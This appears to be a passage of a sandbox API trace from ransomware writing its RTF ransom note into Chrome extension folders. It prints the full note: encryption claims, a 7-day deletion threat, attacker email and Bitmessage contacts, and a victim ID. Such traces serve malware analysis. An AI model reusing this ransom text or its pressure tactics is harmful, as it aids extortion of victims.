lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.365] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.366] CloseHandle (hObject=0x294) returned 1 [0273.366] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\#readme_eman#.rtf")) returned 0xffffffff [0273.366] GetLastError () returned 0x2 [0273.366] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.367] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 